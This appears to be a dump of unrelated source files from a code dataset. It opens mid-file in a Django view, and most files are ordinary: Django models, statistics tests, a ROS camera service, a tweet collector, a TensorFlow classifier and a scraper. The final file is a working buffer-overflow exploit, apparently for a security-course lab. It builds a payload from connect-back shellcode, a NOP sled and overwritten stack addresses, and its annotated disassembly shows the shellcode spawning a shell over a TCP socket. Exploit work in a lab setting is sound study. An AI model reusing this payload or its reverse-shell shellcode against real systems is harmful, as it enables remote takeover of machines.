    template = "companies/list_and_create.html"

    def get(self, request):
        return render(request, self.template)
|
996,111 | 0af97e2f05394e685a8d2127479c913694d02c51 | from __future__ import unicode_literals
from django.db import models
from db.paranoia import ParanoidModel
class Post(ParanoidModel):
    # ParanoidModel: soft-delete base class from db.paranoia (rows are
    # flagged rather than removed -- see that module for exact semantics).
    title = models.CharField(max_length=255)
    description = models.CharField(max_length=500)
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
class Comment(ParanoidModel):
    text = models.TextField(null=True)
    # Deleting a Post cascades to its comments; reverse accessor is
    # `post.post_comments`.
    post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='post_comments')
    created_at = models.DateTimeField(auto_now_add=True)  # set once on insert
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
|
996,112 | 25e1f9e98edf446090014b2cb7f633089b653f82 | '''
Collection of functions to test the stats functions
'''
from app.stats import ptest
from numpy.random import normal, uniform
import numpy as np
np.random.seed(42)
def _test_normality():
    '''
    Smoke test for ptest._check_normality: a gaussian sample must be
    recognised as normal, a uniform sample must not.
    '''
    n_samples = 100
    gaussian_sample = normal(loc=0, scale=1, size=n_samples)
    assert ptest._check_normality(gaussian_sample) == True, "The input distribution is gaussian."
    flat_sample = uniform(low=-1, high=1, size=n_samples)
    assert ptest._check_normality(flat_sample) == False, "The input distribution is not gaussian."
def _test_guassian_comparison():
    '''
    Method to test the _compare_gaussians function.

    NOTE(review): the function name misspells "gaussian"; it is referenced
    by name in the __main__ block, so renaming must touch both places.
    '''
    size = 100
    # Two close gaussians should compare as similar...
    dist1 = normal(loc=0, scale=1, size=size)
    dist2 = normal(loc=0.1, scale=0.9, size=size)
    assert ptest._compare_gaussians(dist1, dist2) == True, "The input distributions are similar."
    # ...a shifted mean should not...
    dist2 = normal(loc=5, scale=1, size=size)
    assert ptest._compare_gaussians(dist1, dist2) == False, "The input distributions are not similar."
    # ...nor a shifted mean with a different spread.
    dist2 = normal(loc=5, scale=5, size=size)
    assert ptest._compare_gaussians(dist1, dist2) == False, "The input distributions are not similar."
def _test_distribution_comparison():
    '''
    Method to test the _compare_distributions function
    '''
    size = 100
    # Two close gaussians should compare as similar.
    dist1 = normal(loc=0, scale=1, size=size)
    dist2 = normal(loc=0.1, scale=0.9, size=size)
    assert ptest._compare_distributions(dist1, dist2) == True, "The input distributions are similar."
    # BUG FIXES: the uniform sample previously used high=-1, producing a
    # degenerate constant distribution, and the second check called
    # _compare_gaussians instead of the function under test.
    dist2 = uniform(low=-1, high=1, size=size)
    assert ptest._compare_distributions(dist1, dist2) == False, "The input distributions are not similar."
if __name__ == "__main__":
    # Run all smoke tests when executed directly.
    _test_normality()
    _test_guassian_comparison()
    _test_distribution_comparison()
996,113 | 9971bf3ae9c3307af31d7174703dea5dfd54e23c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2019 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.http import Http404
from django.db.models import Q
from django.shortcuts import get_object_or_404
from mongoengine.base.datastructures import EmbeddedDocumentList
from emgapi import models as emg_models
class AnalysisJobAnnotationMixin:
    """Analysis Job Annotation Mixin.
    This mixin provides a basic get_queryset that will get an AnalysisJobAnnotation
    and will return the defined property from the Mongo model (annotation_model)
    Usage:
        `annotation_model`: class to be used (the mongo model)
        `annotation_model_property`: field within the class to get the data
        `analysis_job_filters`: a Q object used to filter the AnalysisJob query
    """
    annotation_model = None
    annotation_model_property = None
    analysis_job_filters = None

    def get_queryset(self):
        """Get the AnalysisJob Annotation corresponding property from Mongo.
        """
        # NOTE(review): lstrip strips any leading run of the characters
        # M/G/Y/A, not the literal 'MGYA' prefix; harmless for numeric ids.
        acc = self.kwargs['accession'].lstrip('MGYA')
        job_query = Q(pk=acc)
        if self.analysis_job_filters:
            job_query &= self.analysis_job_filters
        job = get_object_or_404(emg_models.AnalysisJob, job_query)
        analysis = None
        try:
            analysis = self.annotation_model.objects \
                .get(analysis_id=str(job.job_id))
        except self.annotation_model.DoesNotExist:
            # Return an empty EmbeddedDocumentList, the entity exists
            # but it doesn't have annotations
            return EmbeddedDocumentList([], self.annotation_model, self.annotation_model_property)
        # Optional hook: subclasses may define a resolver instead of a
        # plain property name.
        if hasattr(self, "annotation_model_property_resolver"):
            return self.annotation_model_property_resolver(analysis)
        return getattr(analysis, self.annotation_model_property)
class AnnotationRetrivalMixin:
    """Basic annotation retrieval mixin.

    Provides get_queryset/get_object over `annotation_model`, looking the
    object up by accession taken from the view kwargs via `lookup_field`.
    (Class name keeps the historical "Retrival" spelling for compatibility.)
    """
    annotation_model = None

    def get_queryset(self):
        return self.annotation_model.objects.all()

    def get_object(self):
        try:
            accession = self.kwargs[self.lookup_field]
            return self.annotation_model.objects.get(accession=accession)
        except KeyError:
            raise Http404(("Attribute error '%s'." % self.lookup_field))
        except self.annotation_model.DoesNotExist:
            # BUG FIX: annotation_model is itself a class, so
            # `__class__.__name__` named its *metaclass*; use the model
            # class's own __name__ in the error message.
            raise Http404(('No %s matches the given query.' %
                           self.annotation_model.__name__))
|
996,114 | 0a39e3547f1ef16c32e7cabc44781ef6b833b258 | from keras.utils import to_categorical
import numpy as np
import os
import h5py
from matplotlib import pyplot as plt
from sklearn.preprocessing import MinMaxScaler
class Dataset_MedData:
    """Loads paired CT/PET volumes from HDF5 files and prepares train/test
    arrays with a trailing channel axis."""

    def __init__(self, config):
        # config: dict-like; must provide at least "input_path"
        # (and "scaling", per the commented-out block in create_data).
        self.config = config
        self.create_data()
    def create_data(self):
        """Load the training/test HDF5 files; CT volumes become the data,
        PET volumes the labels, each reshaped to have a channel axis."""
        # specify path and import first dataset
        # NOTE(review): relies on os.listdir ordering -- contents[0] is
        # assumed to be the test file and contents[1] the training file;
        # confirm the input directory only ever holds those two files.
        contents = os.listdir(self.config["input_path"])
        filename_test = self.config["input_path"] + contents[0]
        filename_training = self.config["input_path"] + contents[1]
        with h5py.File(filename_training, 'r') as file:
            self.training_CT = np.array(file.get('CT'))
            self.training_PET = np.array(file.get('PET'))
        with h5py.File(filename_test, 'r') as file:
            self.test_CT = np.array(file.get('CT'))
            self.test_PET = np.array(file.get('PET'))
        # CT is the model input, PET the target.
        self.train_data = self.training_CT
        self.train_labels = self.training_PET
        self.test_data = self.test_CT
        self.test_labels = self.test_PET
        # #scale training and test data to a specific range
        # if self.config["scaling"] == True:
        #     max_val = 1
        #     self.train_data, self.test_data = self.scaleToRange(self.train_data, self.test_data, (0,max_val))
        #
        # Append the singleton channel dimension expected by conv layers.
        self.train_data = self.adaptDimensions(dataset=self.train_data)
        self.train_labels = self.adaptDimensions(dataset=self.train_labels)
        self.test_data = self.adaptDimensions(dataset=self.test_data)
        self.test_labels = self.adaptDimensions(dataset=self.test_labels)
        # #reduce training set
        # ratio = 0.05
        # self.train_data = self.train_data[:int(np.floor(ratio*len(self.train_data)))]
        # self.train_labels = self.train_labels[:int(np.floor(ratio*len(self.train_labels)))]
        # self.test_data = self.test_data[:int(np.floor(ratio*len(self.test_data)))]
        # self.test_labels = self.test_labels[:int(np.floor(ratio*len(self.test_labels)))]
        # #to be deleted later
        # train_data = self.train_data
        # train_labels = self.train_labels
        # test_data = self.test_data
        ## test_labels = self.test_labels
        print('Preprocessing finished.')
def adaptDimensions(self, dataset, ndims=1):
dataset_shaped = dataset.reshape(dataset.shape[0], dataset.shape[1], dataset.shape[2], dataset.shape[3], ndims)
return dataset_shaped
def performMeanSubtraction(self, train_data, test_data):
#calculate the mean image of train_data set:
current_mean = np.mean(train_data, axis=0)
#subtract this mean from both train_data and test_data
train_data_meanSub = train_data - current_mean
test_data_meanSub = test_data - current_mean
return train_data_meanSub, test_data_meanSub
|
996,115 | 9a4f6fbdbad7dc21852a890f7606c733fc693281 | #!/usr/bin/env python3
# a class that
import rospy
from my_robot_tutorial.srv import TurnCamera, TurnCameraResponse
import numpy as np
import os
import cv2
from cv_bridge import CvBridge
class TurnCameraClass:
    """ROS service wrapper that returns a pre-rendered camera image for a
    requested turn angle.

    Attributes
    ----------
    available_angles : list of int
        Angles (degrees) for which a stored image file exists.
    ros_service : rospy.Service
        The "turn_camera" service bound to :meth:`send_image`.
    """

    def __init__(self):
        """Register the "turn_camera" ROS service and its supported angles."""
        self.available_angles = [-30, -15, 0, 15, 30]
        self.ros_service = rospy.Service("turn_camera", TurnCamera, self.send_image)

    def read_in_image_by_file_name(self, file_name):
        """Load an image from the Images/ directory next to this script.

        Parameters
        ----------
        file_name : str
            Bare file name, e.g. "15.png".

        Returns
        -------
        numpy.ndarray or None
            The image as read by cv2, or None if the file could not be read.
        """
        dir_name = os.path.dirname(__file__)
        file_location = dir_name + "/Images/" + file_name
        image = cv2.imread(file_location)
        return image

    def get_image(self, angle):
        """Return the stored image whose angle is closest to *angle*.

        Parameters
        ----------
        angle : float
            Requested turn angle in degrees.

        Returns
        -------
        numpy.ndarray
            Image for the nearest available angle.
        """
        # Snap the request to the nearest angle we actually have a file for.
        closest_angle = min(self.available_angles, key=lambda x: abs(x - angle))
        return self.read_in_image_by_file_name(str(closest_angle) + ".png")

    def send_image(self, req):
        """Service callback: answer a TurnCamera request with an image message.

        Parameters
        ----------
        req : TurnCamera request
            Carries ``turn_degrees``, the requested angle.

        Returns
        -------
        TurnCameraResponse
            Response wrapping the image as a ROS image message.
        """
        image = self.get_image(req.turn_degrees)
        image_msg = CvBridge().cv2_to_imgmsg(image)
        return TurnCameraResponse(image_msg)
if __name__ == '__main__':
    try:
        # Start the node, register the service, and block until shutdown.
        rospy.init_node("turn_camera_service_node")
        TurnCameraClass()
        print("Turn Camera Service is Running")
        rospy.spin()
    except rospy.ROSInterruptException:
        # Normal Ctrl-C / node-shutdown path — nothing to clean up.
        pass
|
996,116 | 4c07828e476bc9a8a5d40a0d822692acea37d451 | '''
Tweet_Collector
Collects tweets from the Twitter API using the StreamListener of the Tweepy library
Collected tweets are written to mongoDB
DB and API credentials are read from ./config.py people to follow are stored in ./infos.py
'''
import config
import infos
import pymongo
from tweepy import OAuthHandler, Stream
from tweepy.streaming import StreamListener
import json
import time
def organize_tweet(status):
    """Normalize a raw Twitter Stream status into its canonical parts.

    Extended tweets and retweets keep the original poster and the tweet body
    in different places of the status payload; this helper digs out the
    original (full) text and the original timestamp.

    Parameters
    ----------
    status : dict
        A decoded Twitter status object.

    Returns
    -------
    tuple
        ``(retweet, rt_user, tweet_text, created_at)`` — ``retweet`` is a
        bool, ``rt_user`` is the retweeted user's screen name (False for an
        original tweet), ``tweet_text`` is the full body, ``created_at`` is
        the status timestamp.
    """
    if 'RT' not in status['text']:
        # Original tweet: prefer the extended payload when 'text' is truncated.
        retweet = False
        rt_user = False
        if status['truncated'] == False:
            tweet_text = status['text']
        else:
            tweet_text = status['extended_tweet']['full_text']
    else:
        try:
            retweet = True
            rt_user = status['retweeted_status']['user']['screen_name']
            if status['retweeted_status']['truncated'] == False:
                tweet_text = status['retweeted_status']['text']
            else:
                tweet_text = status['retweeted_status']['extended_tweet']['full_text']
        except (KeyError, TypeError):
            # Narrowed from a bare ``except``: only a missing/odd payload
            # (e.g. "RT" in the text without a retweeted_status) is expected
            # here; any other error should surface instead of being hidden.
            retweet = False
            rt_user = False
            tweet_text = status['text']
    return retweet, rt_user, tweet_text, status['created_at']
def authenticate():
    """Build an authenticated tweepy OAuth handler.

    API credentials are read from ./config.py.
    """
    handler = OAuthHandler(config.TW_API_KEY, config.TW_API_SECRET)
    handler.set_access_token(config.TW_ACC_TOKEN, config.TW_ACC_SECRET)
    return handler
class MaxTweetsListener(StreamListener):
    '''
    Inherits from StreamListener.
    Collects at most ``max_tweets`` statuses, writing each to the
    module-level mongoDB ``collection`` (created in the __main__ block),
    then stops the stream.
    for detailed usage instructions see https://docs.tweepy.org/en/v3.2.0/streaming_how_to.html
    '''
    def __init__(self, max_tweets, *args, **kwargs):
        # initialize the StreamListener
        super().__init__(*args, **kwargs)
        # set the instance attributes
        self.max_tweets = max_tweets  # stop after this many statuses
        self.counter = 0  # statuses handled so far
        self.tweet_list = []  # NOTE(review): appears unused in this class
        self.tweet_content = []  # NOTE(review): appears unused in this class

    def on_connect(self):
        '''
        Called once the stream connection is established.
        '''
        print('connected. listening for incoming tweets')

    def on_data(self, data):
        """
        Processes Tweet when it is intercepted. The tweet is first
        preprocessed by organize_tweet(); the required info is then pulled
        from the tweet and written to mongoDB. Returns False (stopping the
        stream) once ``max_tweets`` statuses have been handled.
        """
        status = json.loads(data)
        # increase the counter
        self.counter += 1
        retweet, rt_user, tweet_text, created_time = organize_tweet(status)
        # Tracked accounts (infos.twitterids) are stored by raw id; everyone
        # else by screen name, with reply targets mapped back through the
        # id table when possible.
        if status['user']['id_str'] in infos.twitterids:
            who = status['user']['id_str']
            try:
                replied_to = status['in_reply_to_screen_name']
            except:
                replied_to = 'NULL'
        else:
            who = status['user']['screen_name']
            try:
                replied_to = infos.twitterids[status['in_reply_to_user_id_str']]
            except:
                replied_to = 'NULL'
        tweet = {
            'id': status['user']['id_str'], #status.user.id_str,
            'who': who,
            'replied_to': replied_to,
            'retweeted': retweet, #status['retweeted'], #status.retweeted,
            'retweeted_from': rt_user,
            'text': tweet_text,
            'timestamp' : created_time
        }
        # write to mongoDB here
        collection.insert_one(tweet)
        print(f'New tweet arrived: {tweet["text"]}')
        # check if we have enough tweets collected
        if self.max_tweets == self.counter:
            # reset the counter
            self.counter=0
            # return False to stop the listener
            return False

    def on_error(self, status):
        # 420 = "Enhance Your Calm" (rate limited); returning False closes
        # the stream so the outer loop can reconnect after a pause.
        if status == 420:
            print(f'Rate limit applies. Stop the stream.')
            return False
if __name__ == '__main__':
    # Reconnect loop: collect up to 100 tweets, then sleep 5 minutes.
    while True:
        # Set mongoDB Connection and get the tweet.data collection
        client = pymongo.MongoClient("mongodb")
        db = client.tweets
        collection = db.tweet_data
        # Authenticate API connection and listen to tweets (maximum 100 tweets per 5 mins)
        auth = authenticate()
        listener = MaxTweetsListener(max_tweets=100)
        stream = Stream(auth, listener)
        # Filter the tweets to only the ones we are interested in
        follow = list(infos.people.values())
        stream.filter(follow=follow, languages=['en'], is_async=False)
        time.sleep(60*5)
|
def add_tags(tag, word):
    """Print *word* wrapped in an opening and closing HTML *tag*.

    Also returns the generated markup so callers can reuse or test it
    (previously the function returned None; returning the string is
    backward-compatible).
    """
    markup = "<%s>%s</%s>" % (tag, word, tag)
    print(markup)
    return markup


add_tags('i', 'Python')
add_tags('b', 'Python Tutorial')
996,118 | bba7f9c03596d028c894871a0095ae942d2565b0 | """ SeismicPro is a library for seismic data processing. """
from setuptools import setup, find_packages
import re
# Extract __version__ from the package source without importing it (importing
# would pull in the heavy scientific dependencies at install time).
with open('seismicpro/__init__.py', 'r') as f:
    version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)

setup(
    name='SeismicPro',
    packages=find_packages(exclude=['tutorials', 'docker_containers', 'datasets', 'models']),
    version=version,
    url='https://github.com/gazprom-neft/SeismicPro',
    license='Apache License 2.0',
    author='Gazprom Neft DS team',
    author_email='rhudor@gmail.com',
    description='A framework for seismic data processing',
    long_description='',
    zip_safe=False,
    platforms='any',
    include_package_data=True,
    # Ship the bundled demo SEG-Y file with the package.
    package_data={'': ['datasets/demo_data/*.sgy']},
    install_requires=[
        'matplotlib>=3.3.1',
        'numba>=0.52.0',
        'numpy>=1.19.5',
        'pandas>=1.1.5',
        'scikit-learn>=0.23.2',
        'scipy>=1.5.2',
        'segyio>=1.9.5',
        'tdigest>=0.5.2.2',
        'tqdm>=4.56.0',
        # Pinned to a specific batchflow commit for reproducibility.
        'batchflow @ git+https://github.com/analysiscenter/batchflow.git@9823f369#egg=batchflow',
    ],
    extras_require={
        'torch': ['torch>=1.7'],
    },
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Topic :: Scientific/Engineering',
    ],
)
996,119 | b2382ae9b0c8e9482f8a6d026108f29b58fd8524 | from django.http import HttpResponse,HttpResponseRedirect
from django.core.context_processors import csrf
from django.template import Context, loader
from django.shortcuts import render_to_response,render
from .forms import *
from .models import *
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required
# Each view below renders one static template of the admin theme.
# NOTE(review): ``template.render('hola')`` passes a string where Django
# templates expect a context mapping — presumably the argument is ignored by
# the template backend in use; confirm against the installed Django version.
def index(request):
    template = loader.get_template('pages/login.html')
    return HttpResponse(template.render('hola'))

def pages(request):
    template = loader.get_template('pages/index.html')
    return HttpResponse(template.render('hola'))

def tables(request):
    template = loader.get_template('pages/tables.html')
    return HttpResponse(template.render('hola'))

def forms(request):
    template = loader.get_template('pages/forms.html')
    return HttpResponse(template.render('hola'))

def flot(request):
    template = loader.get_template('pages/flot.html')
    return HttpResponse(template.render('hola'))

def morris(request):
    template = loader.get_template('pages/morris.html')
    return HttpResponse(template.render('hola'))

def panelswells(request):
    template = loader.get_template('pages/panels-wells.html')
    return HttpResponse(template.render('hola'))

def buttons(request):
    template = loader.get_template('pages/buttons.html')
    return HttpResponse(template.render('hola'))

def notifications(request):
    template = loader.get_template('pages/notifications.html')
    return HttpResponse(template.render('hola'))

def typography(request):
    template = loader.get_template('pages/typography.html')
    return HttpResponse(template.render('hola'))

def icons(request):
    template = loader.get_template('pages/icons.html')
    return HttpResponse(template.render('hola'))

def grid(request):
    template = loader.get_template('pages/grid.html')
    return HttpResponse(template.render('hola'))

def blank(request):
    template = loader.get_template('pages/blank.html')
    return HttpResponse(template.render('hola'))

def thanks(request):
    # Renders the blank template; the string is not shown (see NOTE above).
    template = loader.get_template('pages/blank.html')
    return HttpResponse(template.render('Gracias por su formulario'))
@login_required
def estacion(request):
    """Render the station page with all stations, POs and contractors."""
    station_list = Estacione.objects.all()
    po_list = PO.objects.all()
    contratista_list = Contratista.objects.all()
    return render_to_response(
        'estacion.html',
        {'station_list': station_list, 'po_list': po_list, 'contratista_list': contratista_list, }
    )
def get_name(request):
    """Contact-form view: validate and e-mail the submission on POST,
    render an empty form on GET."""
    # if this is a POST request we need to process the form data
    if request.method == 'POST':
        # create a form instance and populate it with data from the request:
        form = ContactForm(request.POST)
        # check whether it's valid:
        if form.is_valid():
            subject = form.cleaned_data['subject']
            message = form.cleaned_data['message']
            sender = form.cleaned_data['sender']
            cc_myself = form.cleaned_data['cc_myself']

            recipients = ['info@example.com']
            if cc_myself:
                recipients.append(sender)

            # NOTE(review): send_mail is not imported explicitly in this
            # module — presumably it arrives via one of the star imports
            # above; verify, otherwise this raises NameError on a valid POST.
            send_mail(subject, message, sender, recipients)
            return HttpResponseRedirect('/thanks/')

    # if a GET (or any other method) we'll create a blank form
    else:
        form = ContactForm()

    return render(request, 'name.html', {'form': form})
996,120 | e6e77998d74fc5f60e65407436515d16b2b5a8a5 | import tensorflow as tf
if __name__ == '__main__':
    # TF1-style graph: two float placeholders added, fed at run time.
    a = tf.placeholder(tf.float32)
    b = tf.placeholder(tf.float32)
    adder_node = a + b
    sess = tf.Session()
    # Scalars add directly; lists are added element-wise.
    print(sess.run(adder_node, feed_dict = {a:3,b:4.5}))
    print(sess.run(adder_node, feed_dict = {a:[1,3],b:[2,4]}))
996,121 | 87dbd162533d8b8971dd2f7b0606ce3d46cd64e4 | import bs4
from bs4 import BeautifulSoup
import requests
# this url does not work due to react
# URL = "https://www.empireonline.com/movies/features/best-movies-2/"
URL = "http://web.archive.org/web/20200322005914/https://www.empireonline.com/movies/features/best-movies-2/"
INPUT_FILENAME = "movies.html"
OUTPUT_FILENAME = "movies.txt"
def get_webpage(url):
    """Fetch *url* and return the response body as text."""
    return requests.get(url).text
def save_webpage(filename, webpage):
    """Write *webpage* text to *filename* as UTF-8.

    The explicit encoding matches the UTF-8 write of the output file later
    in this script and avoids failures on platforms whose default locale
    encoding cannot represent the scraped characters.
    """
    with open(filename, "w", encoding="utf-8") as fp:
        fp.write(webpage)
def load_webpage(filename):
    """Read and return the cached webpage text from *filename* (UTF-8).

    Explicit UTF-8 mirrors save_webpage() and the final output write, so the
    round-trip is platform-independent.
    """
    with open(filename, encoding="utf-8") as fp:
        return fp.read()
try:
    #
    # if file exist, already downloaded, goto else:
    #
    with open(INPUT_FILENAME) as fp:
        pass
except FileNotFoundError:
    print(f"{INPUT_FILENAME} does not exists")
    print(f"downloading {URL}...")
    webpage = get_webpage(URL)
    print(f"saving {URL} to {INPUT_FILENAME}...")
    save_webpage(INPUT_FILENAME, webpage)
else:
    print(f"{INPUT_FILENAME} exists")
    print(f"loading {URL} from {INPUT_FILENAME}...")
    webpage = load_webpage(INPUT_FILENAME)
finally:
    pass

# print(webpage)

soup = BeautifulSoup(webpage, "html.parser")
# Movie titles are the <h3 class="title"> elements on the archived page.
h3s = soup.find_all(name="h3", class_="title")
h3s_inverted = h3s[::-1]
#
# or
#
# NOTE(review): this also reverses h3s in place, but h3s_inverted (the copy
# made above) is what is used below — the extra reverse() is redundant.
h3s.reverse()

h3: bs4.Tag
movies = [h3.getText() for h3 in h3s_inverted]

print(f"Creating {OUTPUT_FILENAME}")
with open(OUTPUT_FILENAME, "w", encoding="utf-8") as fp:
    fp.write("\n".join(movies))
996,122 | 2aef7c34293d2dae222ef84c42510a55425544e8 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from PIL import Image
import numpy as np
import tensorflow as tf
def load_graph(model_file):
    """Deserialize a frozen TF1 GraphDef from *model_file* into a new Graph."""
    graph = tf.Graph()
    graph_def = tf.GraphDef()

    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)

    return graph
# Load the retrained classifier once at import time and keep a single
# session open for all predictions.
graph = load_graph("faceorplace/output_graph.pb")
labels = ["place", "face"]

input_operation = graph.get_operation_by_name("import/DecodeJpeg")
output_operation = graph.get_operation_by_name("import/final_result")
sess = tf.Session(graph=graph)


def fun_prediction_graph(image_ndarray):
    """Run the classifier on an RGB ndarray; return the argmax label index."""
    results = sess.run(output_operation.outputs[0],
                       {input_operation.outputs[0]: image_ndarray})
    results = np.squeeze(results)
    return results.argmax()
def make_prediction(file_name):
    """Classify an image file as "face" or "place".

    The image is evaluated both at full size and as a center crop (the
    middle half in each dimension); if either pass predicts label index 1
    ("face"), "face" is returned.
    """
    image = Image.open(file_name)
    # Keep only the RGB channels (drops alpha if present).
    image_ndarray = np.array(image)[:, :, 0:3]
    x, y = (list(image_ndarray.shape)[0:2])
    pred = fun_prediction_graph(image_ndarray)
    # doing a close-up and checking for the face again
    pred_closeup = fun_prediction_graph(
        image_ndarray[int(x / 4 * 1):int(x / 4 * 3), int(y / 4 * 1):int(y / 4 * 3), :])
    # if either at close-up or at full-sieze the face is detected, return "face"
    return labels[pred or pred_closeup]


# initialise the graph so the first prediction happens faster
make_prediction("faceorplace/static/faces/face1.png")
996,123 | b9610f2720661f9717356596bc9bcbcffe3e98e7 | from shellcode import shellcode
from struct import pack

# Addresses observed while debugging the vulnerable binary:
# EBP = 0xbffef238
ret_address = 0xbffef23c  # EBP + 4
buf_address = 0xbffeea28
# 0x08048ef8 <+24>: lea -0x810(%ebp),%eax
# so buf_address: EBP - 0x810 = 0xbffeea28
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6'+ \
# '\x31\xc9' + \
# '\x66\x81\xc1\x00\x01' + \
# '\xc1\xe1\x10' + '\x80\xc1\x7f' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
#
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6' + '\x31\xc9' + \
# '\x89\x0d\x80\xff\xff\xfe' + \
# '\xf7\xd1' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
#
# my_sc_code = '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x01' + '\x31\xc9' + \
# '\x51' + '\x83\xc1\x01' + '\x51' + '\x83\xc1\x01' + '\x51' +'\x89\xe1' + \
# '\x31\xd2' +'\xcd\x80' + '\x89\xc6'+ \
# '\x31\xc9' + \
# '\x66\x81\xc1\x43\x44' + \
# '\xc1\xe1\x10' + \
# '\x66\xb9\x41\x42' + \
# '\x51' + '\x66\x68\x7a\x69' + '\x31\xdb' + \
# '\xb3\x02' + '\x66\x53' + '\x89\xe7' + '\x6a\x10' + '\x57' + '\x56' + \
# '\x31\xc0' + '\xb0\x66' + '\x31\xdb' + '\xb3\x03' + '\x89\xe1' + '\xcd\x80' + \
# '\x31\xc0' + '\xb0\x3f' + '\x89\xf3' + '\x31\xc9' + '\xcd\x80' + '\xb0\x3f' + \
# '\x83\xc1\x01' + '\xcd\x80' + '\xb0\x3f' + '\x83\xc1\x01' + '\xcd\x80'
# Shellcode bytes — per the annotated disassembly below: open a TCP socket,
# connect back to the hard-coded address/port, dup the socket onto
# stdin/stdout/stderr and exec /bin//sh.
my_sc_code=("\xba\xf4\xf1\xfe\xbf\x88\x02\x42\x88\x02\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68\x7f\x01\x01\x01\x66\x68\x7a\x69\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80")

# Python 2 print: payload = shellcode + NOP sled + saved-EBP value + new EIP.
print my_sc_code + '\x90'*1907 + pack("<I",buf_address) + pack("<I",ret_address)
#
# print len(shellcode)
# print len(my_sc_code)
# print my_sc_code + shellcode + '\x90'*1933 + pack("<I",buf_address) + pack("<I",ret_address)
# print my_sc_code + shellcode + '\x90'*1912 + pack("<I",buf_address) + pack("<I",ret_address)
# print my_sc_code + shellcode + '\x90'*1912 + pack("<I",buf_address) + pack("<I",ret_address)
## Annotated disassembly:
"""
xorl %eax, %eax
# fixing null byte on IP
mov $0xaaaaaaaa,%edx
mov %al,(%edx)
inc %edx
mov %al,(%edx)
# call socket() routine
# init args for socket(int domain, int type, int protocol)
# domain = 2 (AF_INET) type=1 (SOCK_STREAM), protocol= TCP
xorl %ebx, %ebx
xorl %ecx, %ecx
pushl %ecx
movb $6, %cl # PROTOCOL = TCP
pushl %ecx
movb $1, %cl
pushl %ecx
movb $2, %cl # AF_INET = 2
pushl %ecx
movl %esp, %ecx
movb $1, %bl # SYS_SOCKET = 1
movb $102, %al # call SYS_socketcall
int $0x80
# init for connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
movl %eax, %edx
xorl %eax, %eax
xorl %ecx, %ecx
pushl %ecx
pushl %ecx
pushl $0x44434241 # IP
# For port
